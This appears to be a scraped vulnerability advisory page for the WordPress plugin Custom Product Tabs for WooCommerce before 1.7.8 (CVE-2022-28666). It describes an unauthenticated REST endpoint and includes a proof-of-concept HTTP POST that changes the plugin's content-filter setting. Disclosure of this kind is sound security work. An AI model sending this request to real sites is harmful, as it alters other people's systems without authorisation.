Lucene search
WpvulndbWPEX-ID:2F20E14B-3A97-41C5-A3CE-054ED2450AA3HistoryJun 28, 2022 - 12:00 a.m.
Custom Product Tabs for WooCommerce < 1.7.8 - Unauthenticated Toggle Content Setting Update
2022-06-2800:00:00
wpvulndb
103
woocommerce
custom product tabs
unauthenticated setting update
http
exploit
security
EPSS
0.001
Percentile
31.3%
The plugin does not have proper authorisation in one of its REST endpoint, allowing unauthenticated users to update the “Toggle the_content filter” setting
POST /wp-json/yikes/cpt/v1/settings HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 24
Connection: close
toggle_the_content=falseRelated
prion
prion
Improper access control
2022-07-21 17:15:00
patchstack
patchstack
wpvulndb
wpvulndb
openvas
openvas
nvd
nvd
CVE-2022-28666
2022-07-21 17:15:08
cve
cve
CVE-2022-28666
2022-07-21 17:15:08
cvelist
cvelist